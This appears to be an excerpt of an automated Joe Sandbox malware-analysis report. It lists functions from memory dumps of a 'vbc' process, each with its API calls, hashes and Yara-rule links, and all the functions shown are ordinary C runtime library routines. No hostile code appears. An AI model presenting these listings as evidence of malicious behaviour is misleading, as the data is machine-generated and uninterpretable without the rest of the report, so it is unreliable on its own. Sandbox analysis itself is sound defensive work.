                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 680241177-0
                                                                                                                                                                      • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                      • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                      Function 00D5185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free$_abort
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3160817290-0
                                                                                                                                                                      • Opcode ID: b7a27c4b46560a695bb69038e9be032888963ea972be329fe2c6b487936acdfc
                                                                                                                                                                      • Instruction ID: 9379a8a13df0f2fe860297f5e164dd141d5f5dab13f49a7ff03025da0e6d7443
                                                                                                                                                                      • Opcode Fuzzy Hash: b7a27c4b46560a695bb69038e9be032888963ea972be329fe2c6b487936acdfc
                                                                                                                                                                      • Instruction Fuzzy Hash: 22F06D3A1057107ACE2127396C0AF3A1A569BC2763F284225FD19D6292EE66880E8135
                                                                                                                                                                      Function 00D53FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D53F73,00000003,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002), ref: 00D53FE2
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D53FF5
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00D53F73,00000003,?,00D53F13,00000003,00D6DE80,0000000C,00D5403D,00000003,00000002,00000000), ref: 00D54018
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                      • Opcode ID: 28f3adbafb54f5b648f3a6a9099af8aac511fbfb631caa3c32c464b8937a4660
                                                                                                                                                                      • Instruction ID: 5c2fcfc85b42ea021519f1848f3e0d4248e9c742a0361531f5d6fdeb41cf67f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 28f3adbafb54f5b648f3a6a9099af8aac511fbfb631caa3c32c464b8937a4660
                                                                                                                                                                      • Instruction Fuzzy Hash: 33F03130910718ABCB119B98DC0ABADBFB5EB44757F140154ED09E6290DB749A88DAB1
                                                                                                                                                                      Function 0040BCC2 Relevance: 7.7, APIs: 5, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset$__filbuf__fileno
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2631233692-0
                                                                                                                                                                      • Opcode ID: cfdfca61e8346366d06349e67fcb671145d18b2bdf778b4aba29dc3d0bc76d03
                                                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                      • Opcode Fuzzy Hash: cfdfca61e8346366d06349e67fcb671145d18b2bdf778b4aba29dc3d0bc76d03
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                      Function 00D518DF Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(00000008,?,?,00D515D8,00D53CBB,?,00D51D2A,?,?,00000000), ref: 00D518E4
                                                                                                                                                                      • _free.LIBCMT ref: 00D51919
                                                                                                                                                                      • _free.LIBCMT ref: 00D51940
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00D51D2A,?,?,00000000), ref: 00D5194D
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00D51D2A,?,?,00000000), ref: 00D51956
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                      • Opcode ID: cb9d2af8c9f28d0371731f92727597ba473bb0e94511987602d5e00e0e1c2d70
                                                                                                                                                                      • Instruction ID: e713aa662d1571948051dbd7df58d7530999c5fbbf09bfe59712845c7c0e0bd1
                                                                                                                                                                      • Opcode Fuzzy Hash: cb9d2af8c9f28d0371731f92727597ba473bb0e94511987602d5e00e0e1c2d70
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E01D13E2057116B9F1267786C99B3A165DDBC6377B290125FD25E2292FA62CC0E4C31
                                                                                                                                                                      Function 00D53171 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • _free.LIBCMT ref: 00D53189
                                                                                                                                                                        • Part of subcall function 00D52096: HeapFree.KERNEL32(00000000,00000000,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?), ref: 00D520AC
                                                                                                                                                                        • Part of subcall function 00D52096: GetLastError.KERNEL32(?,?,00D53208,?,00000000,?,00000000,?,00D5322F,?,00000007,?,?,00D52697,?,?), ref: 00D520BE
                                                                                                                                                                      • _free.LIBCMT ref: 00D5319B
                                                                                                                                                                      • _free.LIBCMT ref: 00D531AD
                                                                                                                                                                      • _free.LIBCMT ref: 00D531BF
                                                                                                                                                                      • _free.LIBCMT ref: 00D531D1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                      • Opcode ID: ed9cc85b6dfdaa0ce1b920b348cd2dc7aa0774a2a57ba69e0d49d759ad6b6844
                                                                                                                                                                      • Instruction ID: 9eeae7416862dacb5395e81e2b7960ab73f866e28ccc73904d19ca1733ccacf8
                                                                                                                                                                      • Opcode Fuzzy Hash: ed9cc85b6dfdaa0ce1b920b348cd2dc7aa0774a2a57ba69e0d49d759ad6b6844
                                                                                                                                                                      • Instruction Fuzzy Hash: 13F01D72605700AB8E34EB78F986C2A77D9FA057567680809FD4DD7681DB30FD888AB4
                                                                                                                                                                      Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _fseek_malloc_memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 208892515-0
                                                                                                                                                                      • Opcode ID: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                      • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fe2477137ff98b8fe919820eb2b1ff53dfeab7efe35faa63f44dd20cd1a70ab
                                                                                                                                                                      • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
                                                                                                                                                                      Function 0040BAAA Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2612727730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000413000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000415000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000417000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000422000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000442000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000444000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000448000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000459000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000461000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004B9000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 0000002A.00000002.2612727730.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_400000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __fileno__flsbuf__flush__locking
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2259706978-0
                                                                                                                                                                      • Opcode ID: 1f130242422820d6b56c00bacb6d27fe4196c5af8236d3277c2b4106ec58e935
                                                                                                                                                                      • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f130242422820d6b56c00bacb6d27fe4196c5af8236d3277c2b4106ec58e935
                                                                                                                                                                      • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                                                                                                                      Function 00D534FF Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00D5354C
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D535D5
                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D535E7
                                                                                                                                                                      • __freea.LIBCMT ref: 00D535F0
                                                                                                                                                                        • Part of subcall function 00D532FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00D5332C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2652629310-0
                                                                                                                                                                      • Opcode ID: a65efded8fe7990546a89360bbcec618cf25ea541e76dcc50e1569cbc99b3a11
                                                                                                                                                                      • Instruction ID: c751427d496c836acc4bf2048e54e430d6d76026098d346969cb18b41deb796e
                                                                                                                                                                      • Opcode Fuzzy Hash: a65efded8fe7990546a89360bbcec618cf25ea541e76dcc50e1569cbc99b3a11
                                                                                                                                                                      • Instruction Fuzzy Hash: A231BE72A0021AABDF259F64DC45DAE7BA5EF40352F094269FC04D7250EB35CE98CBB0
                                                                                                                                                                      Function 00D5218B Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D515D8,00000000,00000000,?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue), ref: 00D521BD
                                                                                                                                                                      • GetLastError.KERNEL32(?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue,00D66FC4,FlsSetValue,00000000,00000364,?,00D5192D), ref: 00D521C9
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D52132,00D515D8,00000000,00000000,00000000,?,00D52283,00000006,FlsSetValue,00D66FC4,FlsSetValue,00000000), ref: 00D521D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000002A.00000002.2637837684.0000000000D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D10000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_42_2_d10000_vbc.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3177248105-0
                                                                                                                                                                      • Opcode ID: da5077a97ee0fa8db826cbf19b2d2c4dee961be2dc53d3b266ec444967aa25da
                                                                                                                                                                      • Instruction ID: b492f2de31a09033412d4abc1b4813e6a8635cd1824cbcf442aed1436be058a7
                                                                                                                                                                      • Opcode Fuzzy Hash: da5077a97ee0fa8db826cbf19b2d2c4dee961be2dc53d3b266ec444967aa25da
                                                                                                                                                                      • Instruction Fuzzy Hash: 1201A776641B32ABCF214A79EC44E777B98AF47BA3B250620FE55D7240D720D909C6F0